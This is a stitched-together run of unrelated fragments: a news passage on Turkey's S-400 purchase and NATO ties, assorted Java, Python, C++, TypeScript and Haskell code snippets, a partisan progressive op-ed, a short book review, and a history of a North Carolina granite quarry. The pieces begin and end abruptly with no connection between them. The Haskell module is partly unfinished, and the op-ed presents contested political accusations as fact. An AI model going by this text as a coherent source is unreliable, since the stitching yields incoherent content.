spokesman Ibrahim Kalin said. Erdogan told Reuters in an interview on Thursday that Turkey’s position in NATO had not been weakened by the deal. Still, some fear Turkey might eventually find itself at the periphery of the alliance. “Germany is our most important supplier of weapons after the United States,” said Umit Pamir, a former Turkish diplomat. He said the suspension of arms sales, would “surely impact our defense systems”. Erdogan has been on a push to improve ties with Moscow after Turkey’s economy, particularly its tourism industry, was shaken by sanctions imposed by Russia after Turkey shot down one of its warplanes over Syria in late 2015. He is due to meet Russian President Vladimir Putin next week to discuss a plan agreed by their countries and Iran to reduce the fighting in Syria’s northwestern Idlib province. DIFFERENT SIDES IN SYRIA Turkey supports rebels against Syrian President Bashar al-Assad, who is backed by Russia and Iran. Erdogan plans to visit Iran next month. The two countries agreed in August to boost military cooperation when Iran’s military chief, General Mohammad Baqeri, met Erdogan in a visit. The trip was the first by an Iranian military chief of staff to Turkey since the 1979 Islamic revolution in Iran. While they back opposite sides in Syria, Ankara and Tehran have found some common ground over their opposition to the Kurdish independence referendum in Iraq. Both countries fear that an independent Kurdish state could inflame separatists tensions with their Kurdish minorities. Slideshow (5 Images) Recent discord over the S-400 purchase did not signal a drastic break from NATO for Turkey, said Mustafa Kibaroglu, a professor of international relations at Turkey’s MEF University. He said the West had over-reacted to the purchase. “I don’t think there is any debate about Turkey leaving an alliance it has invested so much in,” Kibaroglu said. “Are we going to bring down U.S. planes with our S-400s?” he said. “There is no backbone to these comments, it is purely political polemics, and we are not the ones doing this.”
package fr.cookiedev.codebreaker.core.questions.impl; import fr.cookiedev.codebreaker.core.Code; import fr.cookiedev.codebreaker.core.Tile; import fr.cookiedev.codebreaker.core.Tile.Color; import fr.cookiedev.codebreaker.core.questions.Question; public class BlackSumQuestionImpl implements Question { @Override public String answer(Code code) { int sum = 0; for (final Tile tile : code.getTiles()) { if (tile.getColor() == Color.BLACK) { sum += tile.getValue(); } } return Integer.toString(sum); } }
def additional_pixel_clock(self): return (self._block[12] >> 2) * 0.25
<gh_stars>1000+ /** Copyright (c) 2015-present, Facebook, Inc. All rights reserved. This source code is licensed under the BSD-style license found in the LICENSE file in the root directory of this source tree. */ #ifndef __xcsdk_SDK_Manager_h #define __xcsdk_SDK_Manager_h #include <xcsdk/SDK/Platform.h> #include <xcsdk/SDK/Toolchain.h> #include <xcsdk/SDK/Target.h> #include <libutil/Filesystem.h> #include <memory> #include <string> #include <ext/optional> namespace libutil { class Filesystem; } namespace xcsdk { class Configuration; } namespace xcsdk { namespace SDK { /* * Represents the contents of a developer root, containing toolchains, * platforms, and SDKs. There is usually only one developer root. */ class Manager { private: std::string _path; std::vector<Platform::shared_ptr> _platforms; std::vector<Toolchain::shared_ptr> _toolchains; public: Manager(); ~Manager(); public: /* * Platforms included in the developer root. */ inline std::vector<Platform::shared_ptr> const &platforms() const { return _platforms; } /* * Toolchains included in the developer root. */ inline std::vector<Toolchain::shared_ptr> const &toolchains() const { return _toolchains; } public: /* * The path to the developer root. */ inline std::string const &path() const { return _path; } public: /* * Find an SDK by name. This does a fuzzy search, so the "name" could * be an SDK name or path, or even the name of a platform. * The provided filesystem will attempt to resolve the name if the name is * a symlinked path. */ Target::shared_ptr findTarget(libutil::Filesystem const *filesystem, std::string const &name) const; /* * Find a toolchain by name. This does a fuzzy search; the "name" could * be a name, path, or identifier for the toolchain. * The provided filesystem will attempt to resolve the name if the name is * a symlinked path. */ Toolchain::shared_ptr findToolchain(libutil::Filesystem const *filesystem, std::string const &name) const; public: /* * Finds all platforms in a platform family. */ std::vector<Platform::shared_ptr> findPlatformFamily(std::string const &identifier); public: /* * Default settings for the contents of the developer root. */ pbxsetting::Level computedSettings() const; public: /* * Standard executable paths for tools found directly in the developer * root, rather than within a toolchain or a platform. */ std::vector<std::string> executablePaths() const; /* * Conglomeration of executable paths that optionally includes extra toolchains * and the paths from an SDK target. */ std::vector<std::string> executablePaths( Platform::shared_ptr const &platform, Target::shared_ptr const &target, std::vector<Toolchain::shared_ptr> const &toolchains) const; public: /* * Load from a developer root. Returns nullptr on error. */ static std::shared_ptr<Manager> Open(libutil::Filesystem const *filesystem, std::string const &path, ext::optional<Configuration> const &configuration); }; } } #endif // !__xcsdk_SDK_Manager_h
def loadUserConfig(self): configFile = '.config' pictureFile = '.picture' userConfig = self.viewRemoteFile(configFile) userConfigData = {} pictureConfig = str(self.viewRemoteFile(pictureFile)) userConfigData['picture'] = str(pictureConfig) for i in userConfig.strip().split("\n"): k, v = i.split(':') userConfigData[k] = v return userConfigData
by We can all agree that President Donald Trump is a disaster for the country. He has been proving this pretty much every day since his inauguration. But Democrats and progressive activists need to do more than decry Trump’s horrific actions, from his ban on immigrants, including refugees, from seven majority-Muslim countries, to his murder of an eight-year-old American girl in a Special Forces raid in Yemen, his order to the US Army Corps of Engineers to approve a permit for the completion of a pipeline upstream of the Standing Rock Sioux reservation, or his nomination of Judge Neil Gorsuch, a Antonin Scalia clone, to fill the late Scalia’s seat on the Supreme Court. Blocking or at least opposing bad executive orders, laws and nominations is of course important, but in a situation where the Republican Party is in solid control of both houses of Congress, it is also futile, and thus only symbolic. Democrats lost control of Congress in 2010, and lost the White House last November, because they were not offering American voters a real progressive alternative. For decades now, the party and its elected officials in Washington have been DINOs (Democrats in Name Only). Corporatists as much as their Republican opponents, they have been posing as something different by playing to their base with things like support for gay marriage, support for the unenforceable and purely aspirational Paris Climate Agreement, and support for…um, well, it’s actually a pretty short list when you think about what Democrats have been for lately that really rates as progressive. Recall that when President Obama came into office, with a solid Democratic majority in both houses of congress, he came off a campaign in which he had vowed to restore open constitutional government, to make it easier for unions to organize, to end the wars in Iraq and Afghanistan, and to kickstart the recession-mired economy with a burst of major deficit spending. He did none of that, and the Democratic Congress did none of it for him either. Obama and the Democrats paid for their lack of decisive progressive action by losing Congress two years later and it’s been downhill ever since. Now they’ve lost the White House too. Unless that party wakes up and realizes that it needs a wholesale makeover, in the form of a return to its New Deal roots, it will lose the Congressional elections in 2018, and it will lose the presidential race in 2020, along with even more state governorships and statehouses (currently 32 of the 50 states are wholly in Republican hands). People have said that third parties have no chance in the US, but the Democratic Party seems hell-bent on proving them wrong by becoming a “third party” on its own, but in a one-party system with the Republicans being the last major party standing. At the rate things are going, we could end up with the next presidential election featuring a Republican nominee, whether Trump or someone else, debating himself because the Democratic nominee won’t make the 15% polling cut-off to be eligible to participate! Most Americans have a pretty low opinion of both parties these days, and are registered as independents for a reason. Republicans, including Trump, were elected largely as a protest vote against eight years of do-nothing Democrats, and the Democratic party is so ossified that it’s unlikely that its leadership, the Democratic National Committee, can be changed, especially in time for the congressional elections of 2018, when we’re likely to see the same lame corporatist candidates running for re-election. This means it’s up to us, the progressive majority in America, to organize a movement outside the Democratic Party, built around those demands that could and would create a powerful force for change. I see four big issues such a movement could be built around: work and retirement security, health care, climate change, and peace and military spending. The demands can be quite simple: Fair Pay and Retirement Security for Everyone! Anyone who works at a full-time job should earn enough to support a family. That means we need a federal minimum wage — now! — of $15 per/hour, with an annual adjustment for inflation. Workers should be able to have union representation on their job if a majority of workers at a company sign cards saying they want one. Period. And Social Security should pay benefits that are high enough that retired people can live decently on those benefits, since it is clear that companies are no longer offering pensions and nobody but the wealthy earns enough to save any significant amount for retirement. Medicare for All! When Obama announced his plan for the complicated and in the end far too costly and ironically named Affordable Care Act, he lied to Congress and the American people saying that while other countries might have socialized medical systems that are cheaper and work well, “We in America have no experience with such systems,” and so we would reform the system “our own way.” In fact, as the president well knew, the US has long experience running both a Canadian-style “single-payer” system, where the government is the insurer, and bargains to set the prices charged by doctors, hospital treatment and drugs (our system is called Medicare, but you have to be 65 in order to qualify for it), and a British-ttyle system of National Health, where doctors work on salary for the government and hospitals are owned by the government (we called it the Veterans Hospital System, only you have to be a veteran in order to get care, and even then the government makes it hard to meet eligibility requirements for treatment). Combat Climate Change! Most people are aware that the earth’s climate is changing rapidly. Farmers in the midwest and Southwest are keenly aware that things are getting hotter and drier, fishermen along the northeast coast know that all the fish are moving northward as warmer seas ruin their habitat, Floridians near the coast can no longer buy new home insurance policies because the insurers see such policies as guaranteed losses they don’t want to face as sea levels rise dramatically, and Alaskans watch tall stands of pine that stretch to the horizon suddenly become “drunken forests” as the trees, growing atop ancient permafrost, suddenly have that solid ground beneath them melt away, leaving them balancing in mud in which their roots can no longer hold them erect. It’s clear to any sentient American with a high-school understanding of science that the climate is out of kilter and that worse is coming unless drastic measures are taken to reduce the pumping of more carbon into the air. And those measures must start immediately. Slash US Military Spending and Bring All the Troops Home! The US military accounts for $1.3 trillion, or 57% of all discretionary spending. This is a figure that is generally hidden from the public by adding into the budget the mandated outlays for Social Security benefits and Medicare. But this is misleading, because those programs, unlike the military, are funded by separate payroll taxes, not by general taxation. Furthermore, unlike Social Security and Medicare, which are mandated benefits, military spending is wholly determined each year by Congress, based upon policies set by the government. And those policies are nuts! No other country in the world spends that much money, either in actual dollars, or as a percentage of its national budget, trying to dominate the entire world. According to the International Institute for Strategic Studies [1], in 2015 the US spent more than four times what China, with the second biggest military budget, spent (and remember that China’s military is mostly used for domestic control, given that the country is still a dictatorship), and almost nine times what our supposedly “existential enemy” Russia spent (Russia that year budgeted less on its military that did Britain!). Clearly the outrageous US military, with its endless wars, its navy armadas on patrol in every ocean and its over 1000 bases around the globe, is bankrupting the US and by itself explains the increasingly third-world status of the US in terms of education, infrastructure, transportation and quality of life. The US military must be cut down to size and refocused on what it is supposed to do: defend America, not control the world. Building a movement around these four big over-arching issues, through mass demonstrations, local organizing in churches, community and social organizations, unions and among friends and neighbors, will either force the nearly moribund Democratic Party to refocus and revitalize itself or will lead to the establishment of a new party on the left to take its place. The model should be the civil rights movement of the 1950s and 1960s, and the anti-war movement of the 1960s and 1970s. Neither of these movements was tied to the Democratic Party, but both forced the Democratic Party — and even to some extent the Republican Party — to come to them and accommodate their demands. Building a left progressive political alternative in the US is doomed to failure if the focus is on the specific demands of “identity” groups, as important as those issues — like gay rights, abortion rights, affirmative action, or immigration reform — may be. It’s not that such issues should be ignored — they should not be — but taken as a whole, they are not unifying demands around which to build a movement. We need to focus on big demands and big issues that benefit all but the ruling elites and that will fundamentally change the way the country operates,. The rest of the changes that are needed will surely follow. The author, arrested and jailed for occupying the Pentagon mall in October ’67, was a war resister and foot-soldier in the anti-war movement of the 1960s and 1970s.
<filename>Android_Project/app/src/main/java/com/example/jigar/booyahproject/rest/model/response/RatingsResponse.java package com.example.jigar.booyahproject.rest.model.response; import com.google.gson.annotations.SerializedName; import java.io.Serializable; import java.util.ArrayList; import java.util.List; /** * Returned in the body of GET requests for existing Booyah! ratings. */ public class RatingsResponse implements Serializable { @SerializedName("seconds") public List<Integer> seconds; @SerializedName("user") public int user; @SerializedName("media") public int media; public RatingsResponse(int user, int media){ this(new ArrayList<Integer>(), user, media); } public RatingsResponse(List<Integer> seconds, int user, int media){ this.seconds = seconds; this.user = user; this.media = media; } }
def _process_ingest(self, ingest, file_path, file_size): if ingest.status not in ['TRANSFERRING', 'TRANSFERRED']: raise Exception('Invalid ingest status: %s' % ingest.status) ingest.file_path = file_path ingest.file_size = file_size if ingest.is_there_rule_match(self._file_handler, self._workspaces): ingest.save() Ingest.objects.start_ingest_tasks([ingest], strike_id=self.strike_id) else: ingest.status = 'DEFERRED' ingest.save()
/** * Created by Haotao_Fujie on 2016/11/9. */ public class ActivityBean { public MallActivity activity; public class MallActivity { public String image; public String desc; public String uri; } }
/** * Provides static utility methods for translating properties between Java and SQL. */ public final class PersistenceHelper { private PersistenceHelper() {} /** * Returns the name of the table associated with class {@code c}. * Table name defaults to the name of the class, but may be customized with the {@link Table} annotation. * @param c class to get table name for * @return name of table matching {@code c} * @see Table */ public static String getName(Class<?> c) { Table override = c.getAnnotation(Table.class); if (override != null && override.value().length() <= 0) throw new IllegalArgumentException(c + " has a Table annotation with an empty name"); return (override == null) ? c.getSimpleName() : override.value(); } /** * Returns the name of the column associated with field {@code f}. * Column name defaults to the name of the field, but may be customized with the {@link Column} annotation. * @param f field to get column name for * @return name of column matching {@code f} * @see Column */ public static String getName(Field f) { Column override = f.getAnnotation(Column.class); if (override != null && override.value().length() <= 0) throw new IllegalArgumentException(f + " has a Column annotation with an empty name"); return (override == null) ? f.getName() : override.value(); } /** * Returns the name of the table associated with field {@code f}. * This is meant for special cases where a field requires its own table instead of a column on the declaring class's table. * Table name is defined as {@code {DECLARING_CLASS_NAME}_{FIELD_NAME}} * @param f field to get table name for * @return name of table matching {@code f} */ public static String getFieldTableName(Field f) { return getName(f.getDeclaringClass()) + "_" + getName(f); } /** @return all declared fields in {@code c} matching the requirements of {@link #isPersistable(Field)} */ public static Stream<Field> getPersistableFields(Class<?> c) { return Arrays.stream(c.getDeclaredFields()) .filter(PersistenceHelper::isPersistable); } /** * Checks whether {@code f} is a "persistable" field. * A field is deemed persistable if it is * <pre> * - Not static * - Not transient * - Not {@link Transient} * - Not synthetic * </pre> * @param f field to test * @return whether {@code f} is a persistable field */ public static boolean isPersistable(Field f) { int modifiers = f.getModifiers(); return !Modifier.isStatic(modifiers) && !Modifier.isTransient(modifiers) && f.getAnnotation(Transient.class) == null && !f.isSynthetic(); } }
/*** * Insert Data Into Mongo With Partitions * * Takes a set of KeySpacePartition objects and a ThreadPoolExecutor and starts a thread on each partition to migrate * data from CouchDB to MongoDB in that range * * @param executor A ThreadPoolExecutor object containing all the threads to run the migration on * @param mongo A Mongo object representing a MongoDB client * @param couchDB An ektorp CouchDBConnector object representing a CouchDB client * @param partitionMap A SortedMap<String, KeySpacePartition> repersenting a map of min key to KeySpace Partition objects * @throws InterruptedException */ private void migrateInBatches(ThreadPoolExecutor executor, Mongo mongo, CouchDbConnector couchDB, SortedMap<String, KeySpacePartition> partitionMap) { logger.info("Migrating data in batches based on partitions..."); for (Map.Entry<String, KeySpacePartition> entry : partitionMap.entrySet()) { KeySpacePartition partition = entry.getValue(); logger.info(String.format("Creating migration batch for key range (%s,%s)", partition.getMinKey(), partition.getMaxKey())); executor.submit(() -> { try { long id = Thread.currentThread().getId() % numThreads; logger.debug(String.format("Starting thread with id %d", id)); int count = 0; while(count++ < MAX_NUM_READ_ATTEMPTS) { try { fetchFromCouchDBAndMigrate(partition.getMinKey(), partition.getMaxKey(), couchDB, mongo); count = MAX_NUM_READ_ATTEMPTS; } catch(Exception ex) { logger.error(String.format("[%d] fetchFromCouchDBAndMigrate: ", id) + ex); sleep(30000); continue; } } logger.debug(String.format("Thread %d finished ", id)); } finally { numProcessed.addAndGet(1); } }); while (executor.getQueue().size() > numThreads) { logger.debug(String.format("thread has %d jobs in queue, throttling", executor.getQueue().size())); try { Thread.sleep(5000); } catch (InterruptedException ex) { logger.error("Encountered an exception when attempting to sleep: " + ex); } } } }
Book Review: IV. Ministry Studies: Enlarge Your World Sunday School Division of the Texas Baptist Convention, has put together a good survey of religious education as this is expressed by Southern Baptists. The different authors include seminary professors, denominational leaders, and practitioners in the local church. Part One explores the foundations of religious education. Part Two gives an analysis of the educational programs in a local church. Part Three describes seven vocational roles in religious education.
/** * @author Crated By YangKai On 2019/12/26 */ @Service @Slf4j public class MessageService { public Mono<String> parseMessageBody(String messageBody) { return Mono.just(messageBody).map(m -> { Map<String, String> messageMap = new HashMap<>(0); SAXReader reader = new SAXReader(); try { Document document = reader.read(new ByteArrayInputStream(m.getBytes(StandardCharsets.UTF_8))); Element root = document.getRootElement(); List<Element> elementList = root.elements(); elementList.forEach(e -> messageMap.put(e.getName(), e.getStringValue())); } catch (DocumentException e) { e.printStackTrace(); } return returnMsg(messageMap); }).doOnError(Throwable::printStackTrace); } private String returnMsg(Map<String, String> msg){ log.info(msg.toString()); Document document = DocumentHelper.createDocument(); Element root = document.addElement("xml"); Element toUserName = root.addElement("ToUserName"); Element fromUserName = root.addElement("FromUserName"); Element createTime = root.addElement("CreateTime"); Element msgType = root.addElement("MsgType"); Element content = root.addElement("Content"); toUserName.addCDATA(msg.get("FromUserName")); fromUserName.addCDATA(msg.get("ToUserName")); createTime.addText(String.valueOf(LocalDateTime.now().toInstant(ZoneOffset.of("+8")).toEpochMilli())); msgType.addCDATA("text"); content.addCDATA("hello"); return root.asXML(); } }
/** * Checks if a given classifier supports the desired capability. * * @author Ingo Mierswa */ public class WekaLearnerCapabilities { public static boolean supportsCapability(Classifier classifier, OperatorCapability lc) { if (!(classifier instanceof SerializedClassifier)) { Capabilities capabilities = classifier.getCapabilities(); if (lc == OperatorCapability.POLYNOMINAL_ATTRIBUTES) { return capabilities.handles(Capabilities.Capability.NOMINAL_ATTRIBUTES); } else if (lc == OperatorCapability.BINOMINAL_ATTRIBUTES) { return capabilities.handles(Capabilities.Capability.BINARY_ATTRIBUTES); } else if (lc == OperatorCapability.NUMERICAL_ATTRIBUTES) { return capabilities.handles(Capabilities.Capability.NUMERIC_ATTRIBUTES); } else if (lc == OperatorCapability.POLYNOMINAL_LABEL) { return capabilities.handles(Capabilities.Capability.NOMINAL_CLASS); } else if (lc == OperatorCapability.BINOMINAL_LABEL) { return capabilities.handles(Capabilities.Capability.BINARY_CLASS); } else if (lc == OperatorCapability.NUMERICAL_LABEL) { return capabilities.handles(Capabilities.Capability.NUMERIC_CLASS); } else if (lc == OperatorCapability.UPDATABLE) { return (classifier instanceof UpdateableClassifier); } else if (lc == OperatorCapability.WEIGHTED_EXAMPLES) { return (classifier instanceof WeightedInstancesHandler); } } return false; } }
<filename>src/features/result/Result.tsx import React, { FC, useEffect } from 'react'; import { useDispatch, useSelector } from 'react-redux'; import result, { ResultState } from './resultSlice'; import { RootState } from '../../app/rootReducer'; import ResultSection from './ResultSection'; import AllLoveTypesSection from './AllLoveTypesSection'; import Loading from '../../components/Loading'; const Result: FC<{}> = () => { const dispatch = useDispatch(); const { loveType, allLoveTypes, isLoading } = useSelector< RootState, ResultState >(state => state.result); useEffect(() => { dispatch(result.actions.fetchResult()); dispatch(result.actions.fetchAllLoveTypes()); }, [dispatch]); const section = isLoading ? ( <Loading /> ) : ( <div> {loveType && <ResultSection loveType={loveType} />} <AllLoveTypesSection loveTypes={allLoveTypes} /> </div> ); return <div>{section}</div>; }; export default Result;
<reponame>zwizwa/asm_tools {- Loop transformation algebra This is a mini-language used to illustrate loop transformations, stripped from all non-essentials such as primtive operations and loop/grid sizes. These can then be lifted to languages with more annotation. These are the (bi-directional) operations in the notation developed in rtl.txt, presented in the direction that is most common (i.e. is actually an optimization). - FUSE i: Bi <- Ai i: Ci <- Bi => i: Bi <- Ai Ci <- Bi - ELIMINATE: i: Ci <- Ai Bi Di <- Ci Ci => i: C <- Ai Bi Di <- C C - HOIST i: C <- A B Ei <- C Di => C <- A B i: Ei <- C Di - INTERCHANGE i: j: Cij <- Aij Bij => j: i: Cij <- Aij Bij -} {-# LANGUAGE DeriveFunctor #-} {-# LANGUAGE DeriveTraversable #-} {-# LANGUAGE GeneralizedNewtypeDeriving #-} --{-# LANGUAGE DeriveAnyClass #-} {-# LANGUAGE FlexibleContexts #-} {-# LANGUAGE FlexibleInstances #-} {-# LANGUAGE UndecidableInstances #-} {-# LANGUAGE ScopedTypeVariables #-} {-# OPTIONS_GHC -Werror -fwarn-incomplete-patterns #-} module Language.Grid.LTA where import Data.Functor.Identity import Data.Foldable import Data.Maybe import Data.Char import Control.Monad.Writer import Control.Monad.Reader import Control.Monad.State import Control.Monad.Fail -- The central data type: nested loops of ANF / SSA sections. type Form' = Form Let' -- The representation is split into container,, -- b is binding type data Form b = LetPrim b | LetLoop Index [Form b] deriving (Functor, Foldable, Traversable) -- .. and contained type, which itself is split into a container of -- cell references. -- Fixme: binding and reference are not the same type Opcode = String -- i is grid index type data Let i = Let (DefCell i) String [RefCell i] | Ret [RefCell i] deriving (Functor, Foldable, Traversable) type Let' = Let Index -- .. and a cell type. This I found tricky to derive: it links the -- Grid entity (e.g. grid name), tp[o the index variable type, and the -- type of transformation perfomed on the index. data Cell t i = Cell Grid [t i] deriving (Functor, Foldable, Traversable) type DefCell = Cell Def type RefCell = Cell Ref -- A definition always uses unadulterated index variables. I.e. you -- can't just arbitrarily write into an array. Note that this is just -- the Identity functor with some printing attached to it. data Def t = Def t deriving (Functor, Foldable, Traversable) -- Distinguish the variable from the index operation (derived from -- variable). data Index = Index Int deriving Eq type Ref' = Ref Index data Ref i = Ref i | BackRef i -- Backwards reference for accumulators deriving (Functor, Foldable, Traversable) -- Note that only delay=1 accumulators are supported, but the code is -- structured to later add full triangle coverage. data Grid = Grid Int deriving Eq -- This makes it all fit in a convenient type class hierarchy, which -- simplifies substitution and analysiscode. -- For convenience, add a wrapper to a bundle a complete a collection -- of forms into a program. data Program b = Program [Form b] deriving (Functor, Foldable, Traversable) -- The generalized fold associated to the data type. Note that this -- is not the same as Foldable, which uses the list-like structure in -- the Functor. The generalized fold maps constructors to functions. -- The type is a composition of two types: the prim/loop distinction -- and use of [] to represent a sequence of bindings. Implement -- generalized folds for both components separately. -- The first fold is primitive and thus needs destructuring foldForm :: ([Form b] -> a') -- foldList -> (b -> a) -- letPrim -> (Index -> a' -> a) -- letLoop -> (Form b -> a) foldForm foldList letPrim letLoop = form where form (LetPrim p) = letPrim p form (LetLoop i fs) = letLoop i $ foldList fs -- The second fold is a modified list foldr foldFormList :: (Form b -> a') -- foldForm -> (a' -> a -> a) -- cons -> a -- nil -> [Form b] -> a foldFormList foldForm cons = foldr cons' where cons' h = cons (foldForm h) -- These then combine through mutual recursion. foldProgram letPrim letLoop cons nil (Program p) = foldFL p where foldFL = foldFormList foldF cons nil foldF = foldForm foldFL letPrim letLoop -- A Show instace to produce the notation used in the comments above. instance ShowP b => Show (Program b) where show p = showp 0 p instance Show c => Show (Let c) where show p = showp 0 p instance ShowP (Form b) => Show (Form b) where show p = showp 0 p instance (Show t, Show c) => ShowP (t, Let c) where showp _ p = show p class ShowP t where showp :: Int -> t -> String tabs 0 = "" tabs n = " " ++ (tabs $ n-1) instance Show (t i) => Show (Cell t i) where show (Cell a is) = show a ++ (concat $ map show is) instance Show Index where show (Index i) = [chr (ord 'i' + i)] instance Show Grid where show (Grid n) = [chr (ord 'A' + n)] instance Show i => Show (Ref i) where show (Ref v) = show v show (BackRef v) = show v ++ "'" instance Show i => Show (Def i) where show (Def v) = show v instance ShowP b => ShowP (Form b) where showp n (LetLoop i p) = tabs n ++ show i ++ ":\n" ++ showp (n+1) (Program p) showp n (LetPrim b) = tabs n ++ showp n b ++ "\n" instance Show c => ShowP (Let c) where showp n (Ret cs) = "ret" ++ showArgs cs showp n (Let c opc cs) = show c ++ " <- " ++ opc ++ showArgs cs showArgs cs = concat $ map ((" " ++) . show) cs instance ShowP b => ShowP (Program b) where showp n (Program fs) = concat $ map (showp n) fs -- The transoformations explained in the comments above. -- FUSE -- -- Fuse can be implemented as a generalized fold operation, where only -- the list constructor is modified. Note that this works bottom up, -- so needs to be run multiple times to perform nested fusing. -- fuse p = Program $ foldProgram LetPrim LetLoop cons [] p where cons h@(LetLoop i1 fs1) t@((LetLoop i2 fs2):t') = case i1 == i2 of True -> (LetLoop i1 (fs1 ++ fs2)) : t' False -> h:t cons a b = a:b -- INTERCHANGE -- -- This is focused on a particular loop. It needs some more context -- to be applied properly. -- interchange (LetLoop i [LetLoop j p]) = (LetLoop j [LetLoop i p]) interchange l = l -- ELIMINATE -- Eliminate requires escape analysis, which is non-local information. -- Note that when we create a single form from a high level -- description, it is known exactly which of the arrays are output and -- which are temporary. However, when we start fusing loops, this -- information is no longer accurate, as an output of one state might -- be fed into another state and become an intermediate value. So we -- do not bother tracking the original information and reconstruct it -- instead. -- Elimination works in two steps. Create the elimination list.. intermediates p = catMaybes $ toList $ fmap intermediate' $ annotate p where intermediate' (ctx, Let c@(Cell a is) _ cs) = case escapes a ctx of False -> Just a True -> Nothing intermediate' (ctx, Ret _) = Nothing -- .. then modify the array dimensionality in a next step. -- FIXME: This broke when refactoring types, but will no longer be -- used in favor of gathering an indirect per array annotation -- dictionary. -- eliminate p = fmap (fmap txCell) p where -- isIntermediate a = elem a $ intermediates p -- txCell c@(Cell a is) = -- if isIntermediate a then (Cell a []) else c eliminate = undefined -- -- CONTEXT ANNOTATION -- Note that there is no context available in the Functor / Foldable / -- Traversable instances. Since the standard container view is so -- convenient, we stick to it as the main abstraction, and provide a -- mechanism that tags each element with its context. annotate :: Program b -> Program (Context b, b) -- Each element has two pieces of information attached: 1) the loop -- nesting context, and 2) the "stack" associated to the sequential -- exeuction context, describing what happens next. type Stack b = [[Form b]] type Context b = ([Index],Stack b) -- Note that it is more convenient to define a single traversal -- routine that annotates everything we know, and define projections -- that strip away the unneeded data, e.g. annotate' proj p = (fmap (\(a,b) -> (proj a, b))) . annotate annotate_i = annotate' fst annotate_s = annotate' snd -- To implement the annotation, a Reader is used to contain the -- current context during traversal. The code is split up into the -- concrete annotation wrapper.. annotate p = p' where p' = runReader (annotateM pushi pushp add_context p) ([],[]) pushp p = withReader (\(is, ps) -> (is, p:ps)) pushi i = withReader (\(is, ps) -> (i:is, ps)) add_context b = do ctx <- ask return (ctx, b) -- ..and the abstract traversal. The traversal itself is the mutual -- recursion pattern associated directly with the 4 constructors, -- sprinkled with pushi, pushp to accumulate context data that can then -- picked up by f. annotateM pushi pushp add_context (Program p) = fmap Program $ forms p where form (LetPrim b) = do b' <- add_context b return $ LetPrim b' form (LetLoop i p) = do p' <- pushi i $ forms p return $ LetLoop i p' forms [] = do return [] forms (f:fs) = do f' <- pushp fs $ form f fs' <- forms fs return (f':fs') -- ESCAPE ANALYSIS -- Given (Context Let, Let) at each binding site, the context can be -- used to perform escape analysis. -- An array escapes the current block if it is referenced after the -- current block has finished executing. This can be expressed in -- terms of the execution stack. escapes :: Grid -> Context Let' -> Bool escapes a (_,(_:future_after_current)) = referenced a $ concat future_after_current escapes _ _ = error "escapes: empty stack" -- To check referencing, check each primtive's dependency list. Note -- that this has quadratic complexity in the most commmon case: a -- temporary, non-escaping binding, as the entire future needs to be -- traversed to determine that there are no references. Is there a -- better way? referenced :: Grid -> [Form Let'] -> Bool referenced a fs = or $ map checkPrim prims where prims = toList $ Program $ fs checkPrim p = or $ map checkCell $ cells p checkCell (Cell a' _) = a' == a cells (Ret rs) = rs cells (Let _ _ rs) = rs -- ACCUMULATOR DISCOVERY -- Similar to how escape analysis can identify grid dimensions that -- can be flattened into a local variable, accumulator discovery -- identifies dimensions in escaping variables that can be flattened -- because they are used only as accumulators. -- ... -- Tests -- Note: 2019/6/2: Taking out the wrappers to generate the language. -- For documentation purposes, it makes more sense to use the -- constructors directly. -- See Loop.hs for the parallel development of the monadic Language, -- which currently needs to diverge structure-wise from what is in -- here. test_val = Program $ [LetLoop (Index 0) $ [LetPrim $ Let (Cell (Grid 2) [Def $ Index 0]) "opc" [Cell (Grid 0) [Ref $ Index 0], Cell (Grid 1) [Ref $ Index 0] ], LetPrim $ Ret $ [Cell (Grid 2) [Ref $ Index 0]] ]]
/** * Writes the specified text value to the file * @param path File path * @param value The value to write * @return The result of the operation (true = successful write, false = write failed) */ public static boolean writeValue(String path, String value) { if (value == null) value = ""; try { FileOutputStream stream = new FileOutputStream(new File(path)); stream.write(value.getBytes()); stream.flush(); stream.close(); return true; } catch (FileNotFoundException e) { Log.e(TAG_WRITE, String.format("The file %s not exists", path)); return false; } catch (IOException e) { Log.e(TAG_WRITE, String.format("Error during file %s writing", path)); return false; } }
/** * Application event that represents configuration file has been changed * * @author Code2Life * @see DynamicConfigPropertiesWatcher */ @Getter @Setter public class ConfigurationChangedEvent extends ApplicationEvent { /** * The diff properties, keys are normalized, values are newest values */ private Map<Object, Object> diff; ConfigurationChangedEvent(Map<Object, Object> diff) { super(diff.keySet()); this.diff = diff; } }
/** * Creates a class out of a given array of bytes with a ProtectionDomain. * * @param name binary name of the class, null if the name is not known * @param b a byte array of the class data. The bytes should have the format of a * valid class file as defined by The JVM Spec * @param offset offset of the start of the class data in b * @param bLength length of the class data * @param cl ClassLoader used to load the class being built. If null, the default * system ClassLoader will be used * @param pd ProtectionDomain for new class * @return class created from the byte array and ProtectionDomain parameters * * @throws NullPointerException if b array of data is null * @throws ArrayIndexOutOfBoundsException if bLength is negative * @throws IndexOutOfBoundsException if offset + bLength is greater than the * length of b */ public Class<?> defineClass(String name, byte[] b, int offset, int bLength, ClassLoader cl, ProtectionDomain pd) { Objects.requireNonNull(b); if (bLength < 0) { throw new ArrayIndexOutOfBoundsException(); } Class<?> result = defineClass0(name, b, offset, bLength, cl, pd); VMLangAccess access = VM.getVMLangAccess(); access.addPackageToList(result, cl); return result; }
On May 14, 1889, the North Carolina Granite Company was founded in Surry County by Thomas Woodroffe. It has been in continuous operation since. Now known as the North Carolina Granite Corporation, it is the world’s largest open-faced granite quarry. The site has produced granite for many high rise buildings and even for the Singapore subway system. Its granite has been used to create several notable structures including the Fort Knox Bullion Depository in Kentucky, the Wright Brothers Monument at Kitty Hawk, the Centennial Olympic Plaza in Atlanta and the World War II Memorial in Washington, D.C. The granite is also popular for curbing, especially in northern states that use salt in winter, since salt breaks down concrete curbs in short order. Other uses for the product include tombstones and mausoleums. Waste granite, the small bits that are left over from extraction and from fabrication, is crushed for road construction and landscape use. Located on the Ararat River near Mt. Airy, the active quarry covers more than 200 acres and is estimated to have enough granite to continue extracting it at the current rate for 500 more years. The quarry is the source of Mt. Airy’s” Granite City” nickname. For more about North Carolina’s history, arts and culture, visit Cultural Resources online. To receive these updates automatically each day, make sure you subscribe by email using the box on the right, and follow us on Facebook, Twitter and Pinterest.
